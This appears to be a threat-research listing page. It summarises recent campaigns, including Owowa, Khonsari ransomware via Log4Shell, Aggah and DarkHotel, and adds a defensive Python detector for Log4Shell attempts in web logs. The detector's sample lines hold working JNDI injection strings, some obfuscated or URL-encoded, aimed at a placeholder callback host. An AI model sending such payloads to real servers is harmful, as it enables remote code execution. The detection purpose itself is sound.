Anvilogic Forge Threat Research Reports
Here you can find an accumulation of trending threats published weekly by the Anvilogic team. We curate threat intelligence to provide situational awareness and actionable insights.
Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
Threat Scenarios: risk-, pattern-, and sequence-based detections that use the outputs of Threat Identifiers to identify actual threats.
• Threat News Reports
• Trending Threat Reports
• Research Articles
Forge Report: First Half Threat Trends of 2024

Featured Threat Reports

All Threat Reports
Threat Group Aggah (TH-157)
Yoroi Malware ZLAB tracks Aggah (TH-157) targeting Eastern Europe with a nine-stage attack involving malicious PowerPoint macros, MSHTA execution, and AgentTesla infostealer. The group varies payload delivery infrastructure every 80 minutes, targeting Ukraine, Lithuania, Italy, and additional Eastern European countries for reconnaissance and data theft.
Sports Gear Sites Data Breach Impacts 1.8 Million People
A cyberattack on Tackle Warehouse, Running Warehouse, Tennis Warehouse, and Skate Warehouse compromised credit card information of 1.8 million customers. Disclosed by a representing law firm, the breach includes names, financial account numbers, credit/debit card numbers with CVV, and account passwords. Notices were sent to affected customers without identity protection services.
Malicious Microsoft Exchange IIS Module Owowa
Kaspersky has identified a malicious IIS module targeting Microsoft Exchange Outlook Web Access (OWA), dubbed "Owowa." The implant captures the credentials of users who successfully authenticate to OWA and lets the operator execute remote commands by submitting specially formed values through the OWA login form. The earliest known sample was compiled in late 2020, and the module has been deployed since April 2021 against targets in parts of Europe, Malaysia, Mongolia, Indonesia, and the Philippines. The malicious module, named "ExtenderControlDesigner," is loaded via a PowerShell script. Because it runs as an IIS module rather than inside the OWA application, it survives Exchange updates; defenders should enumerate the modules loaded by IIS (for example with appcmd.exe list modules) and compare them against a known-good baseline.
Khonsari Ransomware & Log4Shell
The Khonsari ransomware family leverages the Log4Shell vulnerability (CVE-2021-44228) to target Windows servers. The attacker triggers a JNDI lookup in a vulnerable Log4j instance to retrieve and run the malware executable "groenhuyzen.exe." On the C:\ drive the ransomware encrypts only the user directories (Documents, Videos, Pictures, Downloads, Desktop); on every other mounted drive it encrypts files across the whole drive. Encrypted files receive the extension .khonsari.
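Because Khonsari's entry point is the JNDI lookup string, the tactical detection for this campaign is the request that carries it. The following Python example, added here and not taken from Anvilogic, Bitdefender, or any Khonsari sample, shows how to find CVE-2021-44228 exploitation attempts in web server access logs while undoing the two evasions attackers most commonly use: URL encoding and nested Log4j lookups such as `${lower:j}` and `${::-j}`. The log lines are constructed for the example (Apache combined format, RFC 5737 documentation addresses); the function and variable names are the author's choices, not a real product's API.

```python
import re
import urllib.parse
from typing import Optional

# Constructed Apache-style access log lines for illustration; none come from a real incident.
# 203.0.113.0/24 is the RFC 5737 documentation range.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [13/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.8 - - [13/Dec/2021:10:01:04 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.10/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fobj%7D"',
    '10.0.0.10 - - [13/Dec/2021:10:01:06 +0000] "GET /?q=${env:PATH} HTTP/1.1" 200 10 "-" "Mozilla"',
]

# Innermost ${...} lookup: no nested '$', '{' or '}' inside the braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A resolved JNDI lookup using one of the schemes a vulnerable Log4j 2 will dereference.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)\s*:(?P<rest>[^}]*)\}",
    re.IGNORECASE,
)


def _resolve_inner(body: str) -> Optional[str]:
    """Evaluate the obfuscation lookups attackers nest inside a JNDI string.
    Returns None for anything else (e.g. 'jndi:ldap://...') so that text is left intact."""
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.IGNORECASE | re.DOTALL)
    if m:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    # Log4j default-value syntax ${name:-default}; with an empty name (${::-j}) it yields 'j'.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode until stable, then collapse nested lower/upper/default lookups from the inside out."""
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_log_line(line: str) -> Optional[dict]:
    """Return the resolved JNDI lookup, its scheme and callback host, or None if the line has no JNDI lookup.
    Generic lookups such as ${env:PATH} are deliberately not flagged here: they leak data but do not
    load remote classes, so they belong to a separate, lower-severity rule."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    host = re.match(r"//([^/:\s]+)", m.group("rest"))
    return {
        "lookup": m.group(0),
        "scheme": m.group("scheme").lower(),
        "host": host.group(1) if host else None,
    }


def scan_logs(lines) -> list:
    """Scan a batch of lines; returns (line_number, finding) pairs for the hits."""
    hits = []
    for number, line in enumerate(lines, 1):
        finding = scan_log_line(line)
        if finding:
            hits.append((number, finding))
    return hits


if __name__ == "__main__":
    for number, finding in scan_logs(SAMPLE_LOGS):
        print(f"line {number}: {finding['scheme']} callback to {finding['host']} via {finding['lookup']}")
```

The normalization step matters more than the final regex: a rule that only matches the literal `${jndi:` misses both the URL-encoded User-Agent and the `${lower:j}ndi` variant, and both were seen in the wild within days of the disclosure. The extracted callback host is what an analyst pivots on next, since the same LDAP or RMI server typically serves the second-stage payload to every victim.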
Dark Hotel APT Group
Zscaler ThreatLabz has identified recent activity by the DarkHotel APT group, which is attributed to South Korea. The group uses multi-layered malicious documents that drop RTF files and employs persistence techniques such as registry key creation and encoded PowerShell commands.
Clop Ransomware Publishes Confidential Police Data
As reported by 'The Mail' on December 19th, 2021, the Clop ransomware gang compromised IT services provider Dacoll in October 2021 and obtained data from the UK's Police National Computer (PNC). After Dacoll refused to pay the ransom demand, the threat group posted the data on the dark web. The leaked data includes images of motorists captured by the UK's National Automatic Number Plate Recognition (ANPR) system.
Intelligence Levels for Threat Reports
Tactical
Detectable threat behaviors for response with threat scenarios or threat identifiers.
Strategic
General information security news, for awareness.